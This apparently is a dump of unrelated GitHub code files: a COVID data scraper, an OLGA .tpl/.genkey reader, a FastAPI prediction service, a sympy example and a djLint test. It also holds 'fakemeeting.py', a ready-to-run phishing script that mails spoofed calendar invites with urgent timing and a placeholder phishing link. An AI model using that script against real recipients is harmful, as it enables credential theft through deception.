arquivo.write('Curados: ')\r\n arquivo.write(self.br_curados)\r\n arquivo.write('\\n')\r\n arquivo.write('Óbitos: ' )\r\n arquivo.write(self.br_obitos)\r\n print('feito')\r\n arquivo.close()\r\n print('arquivo gravado com sucesso!')\r\n\r\n \r\nclass Tela():\r\n def __init__(self):\r\n layout = [\r\n [sg.Text('varredura do site Coronatrack')],\r\n [sg.Text('digite o email de destino'),sg.Input(key='destino')],\r\n [sg.Text('digite o seu email'),sg.Input(key='remetente')],\r\n [sg.Text('digite sua senha'),sg.Input(key='senha')],\r\n [sg.Checkbox('Enviar Email',key='enviar'), sg.Checkbox('Gravar em um arquivo de texto', key='gravar')],\r\n [sg.Button('iniciar varredura')],\r\n [sg.Output(size=(30,30))]\r\n ] \r\n self.janela = sg.Window('Dados do Corona').layout(layout)\r\n \r\n\r\n\r\n def ir(self):\r\n while True:\r\n self.button, self.values = self.janela.Read()\r\n self.destino = self.values['destino']\r\n self.remetente = self.values['remetente']\r\n self.senha = self.values['senha']\r\n self.enviar = self.values['enviar']\r\n self.gravar = self.values['gravar']\r\n self.corona = Tracker()\r\n self.corona.varrer()\r\n if self.enviar == True:\r\n self.corona.enviar_email(self.remetente,self.senha,self.destino)\r\n else:\r\n pass\r\n if self.gravar == True:\r\n self.corona.gravar_txt()\r\n else: pass\r\n\r\n\r\ndef main():\r\n teste = Tela()\r\n teste.ir()\r\n\r\n\r\nif __name__=='__main__':\r\n main()","repo_name":"augstfabio/automa-o-com-python","sub_path":"coronatrack.py","file_name":"coronatrack.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73610341607","text":"import os\nimport re\nimport platform\nimport numpy as np\nimport pandas as pd\nfrom easy_deco import progress_bar, raise_error\nfrom rackio_AI.readers.tpl.options import TPLOptions\nfrom easy_deco.del_temp_attr import set_to_methods, del_temp_attr\n\n\n@set_to_methods(del_temp_attr)\nclass TPL:\n \"\"\"\n **TPL** class allows to you load into RackioAI .tpl files in pandas.DataFrame format.\n \"\"\"\n\n tpl_options = TPLOptions()\n _instances = list()\n\n def __init__(self):\n\n self.file_extension = \".tpl\"\n self.doc = list()\n # self.genkey = list()\n self.settings = dict()\n TPL._instances.append(self)\n\n def read(self, name, **kwargs):\n \"\"\"\n Read .tpl files\n\n ___\n **Paramaters**\n\n * **:param name:** (str) if *name* is a directory, it reads all .tpl files in that directory.\n If *name* is a .tpl file, it reads only that file\n\n **:return:**\n\n * **doc:** (list[dict]) tpl file reaformated in dictionaries\n ___\n\n ## Snippet code\n\n ```python\n >>> import os\n >>> from rackio_AI import RackioAI, get_directory\n >>> name = os.path.join(get_directory('Leak'), 'Leak01.tpl')\n >>> RackioAI.load(name)\n tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file\n variable Pressure ... Controller_output filename\n unit S PA ... .tpl\n 0 0.000000 568097.3 ... 0.0 Leak01\n 1 0.502732 568098.2 ... 0.0 Leak01\n 2 1.232772 568783.2 ... 0.0 Leak01\n 3 1.653696 569367.3 ... 0.0 Leak01\n 4 2.200430 569933.5 ... 0.0 Leak01\n ... ... ... ... ... ...\n 3214 1618.327000 569341.1 ... 0.0 Leak01\n 3215 1618.849000 569341.3 ... 0.0 Leak01\n 3216 1619.370000 569341.5 ... 0.0 Leak01\n 3217 1619.892000 569341.7 ... 0.0 Leak01\n 3218 1620.413000 569341.9 ... 0.0 Leak01\n \n [3219 rows x 12 columns]\n\n ```\n \"\"\"\n self.doc = self.__read_files(name, **kwargs)\n\n return self.doc\n\n def __read_file(self, filename, **kwargs):\n \"\"\"\n Read only one .tpl file\n\n ___\n **Parameters**\n\n **:param filename:** (str) tpl filename\n\n **:return:**\n\n * **doc:** (dict) .tpl file in a dictionary\n\n ___\n\n ## Snippet code\n\n ```python\n >>> import os\n >>> from rackio_AI import RackioAI, get_directory\n >>> name = os.path.join(get_directory('Leak'), 'Leak01.tpl')\n >>> RackioAI.load(name)\n tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file\n variable Pressure ... Controller_output filename\n unit S PA ... .tpl\n 0 0.000000 568097.3 ... 0.0 Leak01\n 1 0.502732 568098.2 ... 0.0 Leak01\n 2 1.232772 568783.2 ... 0.0 Leak01\n 3 1.653696 569367.3 ... 0.0 Leak01\n 4 2.200430 569933.5 ... 0.0 Leak01\n ... ... ... ... ... ...\n 3214 1618.327000 569341.1 ... 0.0 Leak01\n 3215 1618.849000 569341.3 ... 0.0 Leak01\n 3216 1619.370000 569341.5 ... 0.0 Leak01\n 3217 1619.892000 569341.7 ... 0.0 Leak01\n 3218 1620.413000 569341.9 ... 0.0 Leak01\n \n [3219 rows x 12 columns]\n\n ```\n \"\"\"\n\n doc = dict()\n\n (data_header_section, data) = self.__get_section_from(filename)\n header_section = self.__get_header_section(data_header_section)\n (filename, _) = os.path.splitext(filename)\n\n multi_index = list()\n\n for count, column_name in enumerate(header_section):\n column_name = self.__clean_column_name(column_name)\n\n (tag, unit, variable_type) = self.__get_structure(column_name)\n multi_index.append((tag, variable_type, unit))\n \"fill dictionary\"\n doc[tag] = data[:, count]\n\n data_name = np.array([filename.split(os.path.sep)[-1]] * data.shape[0])\n\n multi_index.append(('file', 'filename', '.tpl'))\n doc['file'] = data_name\n\n self.header = pd.MultiIndex.from_tuples(\n multi_index, names=['tag', 'variable', 'unit'])\n\n # Read Genkey\n\n if hasattr(self, '_join_files'):\n\n _attr = getattr(self, '_join_files')\n\n if not _attr:\n\n genkey_filename = filename.split(os.path.sep)\n genkey_filename.pop(-2)\n genkey_filename = os.path.join(*genkey_filename) + '.genkey'\n genkey = Genkey()\n genkey.read(filename=genkey_filename)\n doc['genkey'] = genkey\n\n # Provisional meanwhile read settings is not implemented.\n doc['settings'] = self.settings\n\n return doc\n\n @progress_bar(desc='Loading .tpl files...', unit='files', gen=True)\n def __read_files(self, filenames, **kwargs):\n \"\"\"\n Read all .tpl files in a list of filenames\n\n ___\n **Parameters**\n\n **:param filenames:** list['str'] filenames list\n\n **:return:**\n\n * **doc:** (list[dict]) tpl file reformated in dictionaries\n\n \"\"\"\n\n return self.__read_file(filenames, **kwargs)\n\n @raise_error\n def __get_section_from(self, filename):\n \"\"\"\n Get time profile section separated by key word in tpl_options.split_expression, for OLGA .tpl files this key is\n CATALOG\n\n ___\n **Parameters**\n\n * **filename:** (str)\n\n **:return:**\n\n * **(data_header_section, data):**\n * **data_header_section:** list['str'] .tpl file header section\n * **data:** (np.ndarray) data section\n\n ```\n \"\"\"\n with open(filename, 'r') as file:\n file = file.read()\n\n sections = file.split(\"{} \\n\".format(\n self.tpl_options.split_expression))\n\n self.tpl_options.header_line_numbers = int(sections[1].split('\\n')[0])\n\n data_header_section = sections[1].split('\\n')\n\n data = self.__get_data(\n data_header_section[self.tpl_options.header_line_numbers + 2::])\n\n return data_header_section, data\n\n def __get_header_section(self, data_header_section):\n \"\"\"\n Get header section tag description of .tpl file\n\n ___\n **Parameters**\n\n * **data_header_section:** list['str'] .tpl file header section\n\n **:return:**\n\n * **header_section:** list('str') each item in the list is tag variable summary in .tpl files\n\n \"\"\"\n header_section = data_header_section[1:\n self.tpl_options.header_line_numbers + 2]\n\n return header_section[-1:] + header_section[:-1]\n\n @staticmethod\n def __get_data(data):\n \"\"\"\n Get time profile section separated by key word in tpl_options.split_expression, for OLGA .tpl files this key is\n CATALOG\n\n **Parameters**\n\n * **data:** (np.ndarray) data section with elements in np.ndarray are strings\n **:return:**\n\n * **data:** (np.ndarray)\n \"\"\"\n rows = len(data)\n new_data = list()\n\n for count, d in enumerate(data):\n\n if count == rows - 1:\n break\n\n new_data.append(np.array([float(item) for item in d.split(\" \")]))\n\n return np.array(new_data)\n\n @staticmethod\n def __clean_column_name(column_name):\n \"\"\"\n\n **Parameters**\n\n * **:param column_name:** (str)\n\n **:return:**\n\n * **column_name:** ('str')\n\n \"\"\"\n\n return column_name.replace(\"'\", \"\").replace(\":\", \"\").replace(\" \", \"_\").replace(\"-\", \"\").replace(\"__\", \"_\")\n\n @staticmethod\n def __get_tag(column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n tag = column_name[0:column_name.find(\"(\") - 1]\n\n if tag.endswith(\"_\"):\n tag = tag[0:-1]\n\n return tag\n\n @staticmethod\n def __get_unit(column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n return column_name[column_name.find(\"(\") + 1:column_name.find(\")\")]\n\n @staticmethod\n def __get_variable_type(column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n return column_name[column_name.find(\")\") + 2::]\n\n def __get_structure(self, column_name):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param column_name:**\n\n **:return:**\n\n \"\"\"\n tag = self.__get_tag(column_name)\n\n unit = self.__get_unit(column_name)\n\n variable_type = self.__get_variable_type(column_name)\n\n return tag, unit, variable_type\n\n def __to_dataframe(self, join_files: bool = True):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n None\n\n **:return:**\n\n \"\"\"\n return self.__join(flag=join_files)\n\n def __to_series(self):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n None\n\n **:return:**\n\n \"\"\"\n return self.__join(flag=False)\n\n def __to_csv(self, **kwargs):\n \"\"\"\n ...Documentation here...\n\n **Paramters**\n\n * **:param kwargs:**\n\n **:return:**\n\n \"\"\"\n df = self.__join(flag=True)\n\n df.to_csv(os.path.join(kwargs['path'], kwargs['filename']))\n\n @staticmethod\n def __coerce_df_columns_to_numeric(df, column_list):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param df:**\n * **:param column_list:**\n\n **:return:**\n\n \"\"\"\n df[column_list] = df[column_list].apply(pd.to_numeric, errors='coerce')\n\n return df\n\n def __join(self, flag=True):\n \"\"\"\n ...Documentation here...\n\n **Parameters**\n\n * **:param flag:**\n\n **:return:**\n\n \"\"\"\n if flag:\n\n # Making dataframes\n d = self.__making_dataframes(self.doc)\n df = pd.concat(d)\n change = [key[0] for key in self.header.values if key[0] != 'file']\n df = self.__coerce_df_columns_to_numeric(df, change)\n\n return df\n\n else:\n # columns = self.doc[0].keys()\n index_name = list()\n new_data = list()\n\n for count, data in enumerate(self.doc):\n\n # print(f\"data: {data}\")\n columns = data.keys()\n attrs = [data[key] for key in columns if key !=\n 'genkey' and key != 'settings']\n # breakpoint()\n index_name.append('Case{}'.format(count))\n\n new_data.append({\n 'tpl': pd.DataFrame(np.array(attrs).transpose(), columns=self.header),\n 'genkey': data['genkey'],\n 'settings': data['settings']\n }\n )\n # breakpoint()\n # print(f\"New Data: {new_data}\")\n # data = pd.Series(new_data)\n # data.index = index_name\n\n return new_data\n\n def to(self, data_type, join_files: bool = True, **kwargs):\n \"\"\"\n This method allows to you transform from .tpl to a 'data_type'\n\n **Parameers**\n\n * **:param data_type:** (str) 'dataframe' - 'series' - 'csv'\n * **:param kwargs:**\n * **filename:** (str) 'name.csv' if date_type == 'csv'\n * **path:** (str ) path to save csv file\n\n **:return:**\n\n \"\"\"\n\n kwargs_default = {'path': os.getcwd(),\n 'filename': 'tpl_to_csv.csv'}\n options = {key: kwargs[key] if key in kwargs.keys(\n ) else kwargs_default[key] for key in kwargs_default.keys()}\n\n if data_type.lower() == 'dataframe':\n\n return self.__to_dataframe(join_files=join_files)\n\n elif data_type.lower() == 'series':\n\n return self.__to_series()\n\n elif data_type.lower() == 'csv':\n\n self.__to_csv(**options)\n\n return self.doc\n\n else:\n\n raise NameError('{} is not possible convert to {}'.format(\n type(self).__name__, data_type.lower()))\n\n def __making_dataframes(self, doc):\n \"\"\"\n\n \"\"\"\n for data in doc:\n\n yield pd.DataFrame(map(list, zip(*list(data.values()))), columns=self.header)\n\n\nclass Genkey(dict):\n\n def __init__(self, *args, **kwargs):\n self.__previous_line = None\n self.__previous_item = None\n self._keys = list()\n super().__init__(*args, **kwargs)\n\n def set_previous_item(self, item: str):\n\n self.__previous_item = item\n\n def get_previous_item(self) -> str:\n\n return self.__previous_item\n\n def set_previous_line(self, line: str):\n\n self.__previous_line = line\n\n def get_previous_line(self):\n\n return self.__previous_line\n\n def __append_key(self, key: str):\n\n if key not in self.__get_keys():\n\n self._keys.append(key)\n\n def __clean_keys(self):\n\n self._keys = list()\n\n def __clean_last_key(self):\n\n self._keys.pop(-1)\n\n def __get_keys(self):\n\n return self._keys\n\n # def __setitem__(self, key: str, value=None):\n\n # if key in self.keys():\n\n # _value = self.__getitem__(key)\n\n # if _value is None:\n\n # _value = list()\n\n # if isinstance(_value, list):\n\n # _value.append(value)\n\n # return super().__setitem__(key, _value)\n\n # return super().__setitem__(key, Genkey())\n\n # def __getitem__(self, key: str):\n\n # return super().__getitem__(key)\n\n # def read(self, filename: str):\n # r\"\"\"\n # Documentation here\"\"\"\n # with open(filename, \"r\") as file:\n\n # lines = file.readlines()\n\n # for line in lines:\n\n # previous_line = self.get_previous_line()\n\n # if previous_line:\n\n # line = previous_line.replace(\"\\\\\", line.lstrip())\n\n # # Join line continuation\n # if \"\\\\\" in line:\n # line.replace(\"\\\\\", \"\")\n # self.set_previous_line(line)\n # continue\n # else:\n\n # self.set_previous_line(None)\n\n # if line.startswith(\"!*\"):\n\n # continue\n\n # # if line.startswith(\" \"):\n\n # # continue\n\n # # Setting first level keys\n # if line.strip().startswith(\"! \"):\n # self.__clean_keys()\n # key = line.strip().split(\"!\")[1].strip()\n # self.__append_key(key)\n # self.__setitem__(key)\n\n # # breakpoint()\n\n # continue\n\n # # Setting second level keys\n # value = re.search('\\w+\\s', line)\n # if not value:\n\n # continue\n\n # _key = value.group(0)\n # _items = line.split(f\"{_key}\")[-1]\n # self.__append_key(_key.lstrip().rstrip())\n\n # _items = _items.split(\", \")\n # # print(f\"Items: {_items}\")\n\n # # Iteration in last key - value\n # for item in _items:\n # # Is an item key - value\n # breakpoint()\n # if \"=\" in item:\n # previous_item = self.get_previous_item()\n # if previous_item:\n # key, value = self.get_previous_item().split(\"=\")\n # self.__append_key(key)\n # continue\n # # print(f\"Keys: {self.__get_keys()}\")\n # # print(f\"value: {value}\")\n # self.set_previous_item(item)\n # # key, value = self.get_previous_item().split(\"=\")\n # self.__setitem__(key=self._key)\n\n # self.__clean_last_key()\n # continue\n\n # # This item belongs to previous item\n # else:\n\n # _item = self.get_previous_item() + \", \" + item\n # self.set_previous_item(_item)\n\n # self.__clean_last_key()\n\n # TODO: Refactor and document the class' methods.\n\n def clean_lines(self, lines: str):\n '''\n Documentation here\n '''\n # Append lines when it has \\\\\n _el = ''\n broken_lines = []\n for el in lines.split('\\n'):\n if re.search('\\\\\\\\', el):\n if not _el:\n _el = el\n continue\n _el += el\n continue\n\n if el.find('\\\\\\\\') == -1 and _el and bool(el.strip()):\n _el += el\n _el = ' '.join([e.strip() for e in _el.split('\\\\')])\n broken_lines.append(_el.strip())\n _el = ''\n continue\n\n if bool(el.strip()):\n broken_lines.append(el.strip())\n\n # Append lines when it starts with third level key\n _el = ''\n fixed_lines = []\n second_key_pattern = re.compile(r'^[a-zA-Z]+\\s\\w+')\n third_key_pattern = re.compile(r'^[a-zA-Z]+\\=|^[a-zA-Z]+\\s\\=')\n\n for line in broken_lines:\n if second_key_pattern.search(line):\n _el = line\n fixed_lines.append(line)\n continue\n\n if third_key_pattern.search(line):\n line = ' ' + line\n _el += line\n fixed_lines.append(_el)\n continue\n\n return fixed_lines\n\n def split_values(self, line):\n '''\n Documentation here\n '''\n _info = ''\n _el = ''\n clean_line = []\n flag = False\n second_key_pattern = re.compile(r'^[A-Z]+\\s')\n opening_third_key_pattern_1 = re.compile(\n r'^[A-Z]+\\=\\(|^[A-Z]+\\s\\=\\s\\(')\n opening_third_key_pattern_2 = re.compile(r'^[A-Z]+\\=\\(')\n third_key_pattern = re.compile(r'^[A-Z]+\\=')\n closing_third_key_pattern = re.compile(r'\\)$|\\)\\s.+$')\n\n for el in line.split(', '):\n if second_key_pattern.search(el):\n splited_line = el.split(' ')\n clean_line.append(splited_line[0])\n second_key = ' '.join([e for e in splited_line[1:]])\n\n if opening_third_key_pattern_1.search(second_key):\n _el = second_key\n flag = True\n continue\n el = second_key\n clean_line.append(el)\n continue\n\n if opening_third_key_pattern_2.search(el):\n _el = el\n flag = True\n continue\n\n if third_key_pattern.search(el):\n if re.search(r'^INFO', el):\n _info = el\n continue\n\n clean_line.append(el)\n continue\n\n if re.search(r'^INFO', _info):\n _info = _info + ', ' + el\n clean_line.append(_info)\n _info = ''\n continue\n\n if flag:\n el = ', ' + el\n _el += el\n\n if closing_third_key_pattern.search(el):\n clean_line.append(_el)\n _el = ''\n flag = False\n\n return clean_line\n\n def get_dict_values(self, values: list):\n '''\n Documentation here\n '''\n k = [el.split('=')[0].strip() for el in values]\n v = [el.split('=')[1].strip() for el in values]\n k_v = dict(zip(k, v))\n\n pattern = re.compile(r'\\d\\s\\w|\\d\\)\\s\\w+|\\d\\)\\s\\%|\\d\\s\\%|\\(\\\"\\w+')\n for key, val in k_v.items():\n if re.search(r'\\(\\\"\\.\\./|\\(\\\"\\w+', val):\n val = [e.replace('\"', '').replace('(', '').replace(')', '').strip()\n for e in val.split(',')]\n val = tuple(val)\n k_v[key] = val\n continue\n\n if re.search(r'^INFO', key):\n val = val.replace('\"', '')\n k_v[key] = val\n continue\n\n if re.search(r'PVTFILE', key) and not re.search(r'\\(\\\"\\.\\./|\\(\\\"\\w+', val):\n k_v[key] = val.replace('\"', '')\n continue\n\n if pattern.search(val):\n if re.search(r'TERMINALS', key):\n val = val.replace('(', '').replace(')',\n '').replace(',', '')\n val = [e.strip() for e in val.split(' ')]\n _val = []\n _el = ''\n n = 0\n for el in val:\n n += 1\n if n == 1:\n _el = el\n continue\n\n if n == 2:\n el = ' ' + el\n _el += el\n _val.append(_el)\n n = 0\n continue\n VALUE = tuple(_val)\n k_v[key] = VALUE\n continue\n else:\n val = val.split(' ')\n VALUE = ' '.join([el for el in val[:-1]])\n UNIT = val[-1]\n plural = False\n VALUE = eval(VALUE)\n\n if isinstance(VALUE, tuple):\n plural = True\n\n k_v[key] = {\n f'VALUE{\"S\" if plural else \"\"}': VALUE,\n 'UNIT': UNIT.strip(',')\n }\n continue\n\n if re.search(r'\\d+\\.\\d+|^[0-9]*$', val):\n k_v[key] = eval(val)\n continue\n\n k_v[key] = val.replace('\"', '')\n\n return k_v\n\n def read(self, filename: str):\n '''\n Documentation here\n '''\n assert isinstance(\n filename, str), f'filename must be a string! Not {type(filename)}'\n \n try:\n\n with open(filename, 'r') as f:\n file = f.read()\n\n except:\n\n with open(os.path.sep + os.path.join(filename), 'r') as f:\n file = f.read()\n\n # Splitting Genkey in principal elements\n split_genkey_elements_pattern = re.compile('\\s\\n')\n genkey_elements = []\n\n for element in split_genkey_elements_pattern.split(file):\n genkey_elements.append(element)\n\n # Getting first level and second level Genkey keys\n first_level_key_pattern = re.compile('!\\s\\w+.+')\n first_level_keys = []\n second_level_keys = []\n\n for el in genkey_elements:\n genkey_element = ' '.join([c.strip() for c in el.split(' ')])\n _first_level_key = first_level_key_pattern.search(genkey_element)\n\n if _first_level_key:\n first_level_key = _first_level_key.group().replace('!', '').strip()\n first_level_keys.append(first_level_key)\n\n lines = self.clean_lines(el)\n elements = list(map(self.split_values, lines))\n second_keys = [el[0] for el in elements]\n list_values = [el[1:] for el in elements]\n values = list(map(self.get_dict_values, list_values))\n key_vals_list = list(zip(second_keys, values))\n\n key_vals_dict = {}\n for key in key_vals_list:\n key_vals_dict.setdefault(key[0], []).append(key[1])\n\n for key, val in key_vals_dict.items():\n if len(val) == 1:\n key_vals_dict[key] = key_vals_dict.get(key)[0]\n\n second_level_keys.append(key_vals_dict)\n\n # Putting together first and second level keys\n genkey_keys = list(zip(first_level_keys, second_level_keys))\n\n # Creating list of second level keys for duplicated first level keys\n for key in genkey_keys:\n self.setdefault(key[0], []).append(key[1])\n\n # Extracting second level keys from list if first level key is not duplicated.\n for key, val in self.items():\n if len(val) == 1:\n self[key] = self.get(key)[0]\n\n for key, val in self.items():\n if val == {}:\n self[key] = None\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"crivero7/RackioAI","sub_path":"rackio_AI/readers/tpl/tpl_core.py","file_name":"tpl_core.py","file_ext":"py","file_size_in_byte":26588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5958771024","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nfrom pycaret.classification import load_model, predict_model\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nimport os\n\n# Create the app\napp = FastAPI()\n\n# Load trained Pipeline\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nMODEL_PATH = os.path.join(BASE_DIR, \"model/heart_predict\")\n\nmodel = load_model(MODEL_PATH)\n\n# Define Pydantic models\nclass HeartPredictInput(BaseModel):\n age: float\n sex: float\n cp: float\n trestbps: float\n chol: float\n fbs: float\n restecg: float\n thalach: float\n exang: float\n oldpeak: float\n slope: float\n ca: float\n thal: float\n\nclass HeartPredictOutput(BaseModel):\n prediction: int\n\n# Define predict function\n@app.post(\"/predict\", response_model=HeartPredictOutput)\ndef predict(data: HeartPredictInput):\n data = pd.DataFrame([data.dict()])\n predictions = predict_model(model, data=data)\n return {\"prediction\": predictions[\"prediction_label\"].iloc[0]}\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n","repo_name":"ipatriciahonorato/modulo-7","sub_path":"Ponderada 3/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16690994085","text":"#程序文件ex17_3.py\r\nimport sympy as sp\r\n\r\nsp.var('x,y') #定义符号变量\r\nf = sp.Function('f') #定义符号函数\r\nu = f(x,y); ux = u.diff(x); uy = u.diff(y)\r\neq = x*ux - y*uy + y**2*u - y**2\r\nsp.pprint(eq) #显示方程\r\ns = sp.pdsolve(eq) #求通解\r\nsp.pprint(s) #显示通解\r\n\r\n","repo_name":"LuyuZhang00/CUMCM2022","sub_path":"python数学建模算法与应用/17第17章 偏微分方程/ex17_3.py","file_name":"ex17_3.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21391343999","text":"\"\"\"Test interpolation.\n\npoetry run pytest tests/test_html/test_interpolation.py\n\"\"\"\nimport pytest\n\nfrom src.djlint.reformat import formatter\nfrom tests.conftest import printer\n\ntest_data = [\n pytest.param(\n (\n \"
        Fuga magnam facilis. Voluptatem quaerat porro.{{\\n\"\n \"x => {\\n\"\n \" const hello = 'world'\\n\"\n \" return hello;\\n\"\n \"}\\n\"\n \"}} Magni consectetur in et molestias neque esse voluptatibus voluptas. {{\\n\"\n \"\\n\"\n \"\\n\"\n \" some_variable\\n\"\n \"}} Eum quia nihil nulla esse. Dolorem asperiores vero est error {{\\n\"\n \" preserve\\n\"\n \" invalid\\n\"\n \"\\n\"\n \" interpolation\\n\"\n \"}} reprehenderit voluptates minus {{console.log( short_interpolation )}} nemo.
        \\n\"\n ),\n (\n \"\\n\"\n \"
        \\n\"\n \" Fuga magnam facilis. Voluptatem quaerat porro.{{\\n\"\n \" x => {\\n\"\n \" const hello = 'world'\\n\"\n \" return hello;\\n\"\n \" }\\n\"\n \" }} Magni consectetur in et molestias neque esse voluptatibus voluptas. {{\\n\"\n \" some_variable\\n\"\n \" }} Eum quia nihil nulla esse. Dolorem asperiores vero est error {{\\n\"\n \" preserve\\n\"\n \" invalid\\n\"\n \" interpolation\\n\"\n \" }} reprehenderit voluptates minus {{ console.log(short_interpolation) }} nemo.\\n\"\n \"
        \\n\"\n ),\n id=\"interpolation_in_text\",\n ),\n]\n\n\n@pytest.mark.parametrize((\"source\", \"expected\"), test_data)\ndef test_base(source, expected, basic_config):\n output = formatter(basic_config, source)\n\n printer(expected, source, output)\n assert expected == output\n","repo_name":"Riverside-Healthcare/djLint","sub_path":"tests/test_html/test_interpolation.py","file_name":"test_interpolation.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"53"} +{"seq_id":"10606098307","text":"import time\r\nimport codecs\r\nimport smtplib\r\nimport datetime\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.base import MIMEBase\r\nfrom email.encoders import encode_base64\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.utils import COMMASPACE, formatdate\r\n\r\n\r\n# smtp settings\r\nSERVER = 'smtp.gmail.com'\r\nPORT = 587\r\nUSER_EMAIL = \"\"\r\nUSER_PASS = \"\"\r\n\r\n# email settings\r\nEMAIL_SUBJECT = \"Corona Meeting\"\r\n\r\n# event settings\r\nEVENT_DESCRIPTION = \"Corona Update Meeting\"\r\nEVENT_SUMMARY = \"Corona update meeting\"\r\n\r\nORGANIZER_NAME = \"Bill Gates\"\r\nORGANIZER_EMAIL = \"bill@microsoft.com\"\r\nATTENDEES = [\"bob@microsoft.com\", \"john@microsoft.com\"]\r\n\r\n# template settings\r\nEVENT_TEXT = \"Corona update\"\r\nEVENT_URL = \"https://phishing-url-here\"\r\n\r\n\r\ndef load_template():\r\n template = \"\"\r\n with codecs.open(\"email_template.html\", 'r', 'utf-8') as f:\r\n template = f.read()\r\n return template\r\n\r\n\r\ndef prepare_template():\r\n email_template = load_template()\r\n email_template = email_template.format(EVENT_TEXT=EVENT_TEXT, EVENT_URL=EVENT_URL)\r\n return email_template\r\n\r\n\r\ndef load_ics():\r\n ics = \"\"\r\n with codecs.open(\"iCalendar_template.ics\", 'r', 'utf-8') as f:\r\n ics = f.read()\r\n return ics\r\n\r\n\r\ndef prepare_ics(dtstamp, dtstart, dtend):\r\n ics_template = load_ics()\r\n ics_template = ics_template.format(DTSTAMP=dtstamp, DTSTART=dtstart, DTEND=dtend, ORGANIZER_NAME=ORGANIZER_NAME, ORGANIZER_EMAIL=ORGANIZER_EMAIL, DESCRIPTION=EVENT_DESCRIPTION, SUMMARY=EVENT_SUMMARY, ATTENDEES=generate_attendees())\r\n return ics_template\r\n\r\n\r\ndef generate_attendees():\r\n attendees = []\r\n for attendee in ATTENDEES:\r\n attendees.append(\"ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;RSVP=FALSE\\r\\n ;CN={attendee};X-NUM-GUESTS=0:\\r\\n mailto:{attendee}\".format(attendee=attendee))\r\n return \"\\r\\n\".join(attendees)\r\n\r\n\r\ndef send_email(to):\r\n print ('Sending email to: ' + to)\r\n\r\n # in .ics file timezone is set to be utc\r\n utc_offset = time.localtime().tm_gmtoff / 60\r\n ddtstart = datetime.datetime.now()\r\n dtoff = datetime.timedelta(minutes=utc_offset + 5) # meeting has started 5 minutes ago\r\n duration = datetime.timedelta(hours = 1) # meeting duration\r\n ddtstart = ddtstart - dtoff\r\n dtend = ddtstart + duration\r\n dtstamp = datetime.datetime.now().strftime(\"%Y%m%dT%H%M%SZ\")\r\n dtstart = ddtstart.strftime(\"%Y%m%dT%H%M%SZ\")\r\n dtend = dtend.strftime(\"%Y%m%dT%H%M%SZ\")\r\n\r\n ics = prepare_ics(dtstamp, dtstart, dtend)\r\n\r\n email_body = prepare_template()\r\n\r\n msg = MIMEMultipart('mixed')\r\n msg['Reply-To']=USER_EMAIL\r\n msg['Date'] = formatdate(localtime=True)\r\n msg['Subject'] = EMAIL_SUBJECT\r\n msg['From'] = USER_EMAIL\r\n msg['To'] = to\r\n\r\n part_email = MIMEText(email_body,\"html\")\r\n part_cal = MIMEText(ics,'calendar;method=REQUEST')\r\n\r\n msgAlternative = MIMEMultipart('alternative')\r\n msg.attach(msgAlternative)\r\n\r\n ics_atch = MIMEBase('application/ics',' ;name=\"%s\"' % (\"invite.ics\"))\r\n ics_atch.set_payload(ics)\r\n encode_base64(ics_atch)\r\n ics_atch.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % (\"invite.ics\"))\r\n\r\n eml_atch = MIMEBase('text/plain','')\r\n eml_atch.set_payload(\"\")\r\n encode_base64(eml_atch)\r\n eml_atch.add_header('Content-Transfer-Encoding', \"\")\r\n\r\n msgAlternative.attach(part_email)\r\n msgAlternative.attach(part_cal)\r\n\r\n mailServer = smtplib.SMTP(SERVER, PORT)\r\n mailServer.ehlo()\r\n mailServer.starttls()\r\n mailServer.ehlo()\r\n mailServer.login(USER_EMAIL, USER_PASS)\r\n mailServer.sendmail(USER_EMAIL, to, msg.as_string())\r\n mailServer.close()\r\n\r\n\r\ndef main():\r\n send_email(\"\")\r\n\r\n\r\nmain()\r\n","repo_name":"ExAndroidDev/fakemeeting","sub_path":"fakemeeting.py","file_name":"fakemeeting.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"33531114939","text":"def formatTime(num_seconds):\n num_seconds_in_a_minute = 60\n num_seconds_in_an_hour = 3600\n num_seconds_in_a_day = 3600*24\n num_seconds_in_a_year = 3600*24*365\n period_text_singular = ['year', 'day', 'hour', 'minute', 'second']\n period_text_plural = ['years', 'days', 'hours', 'minutes', 'seconds']\n time_calculation_index = 0\n 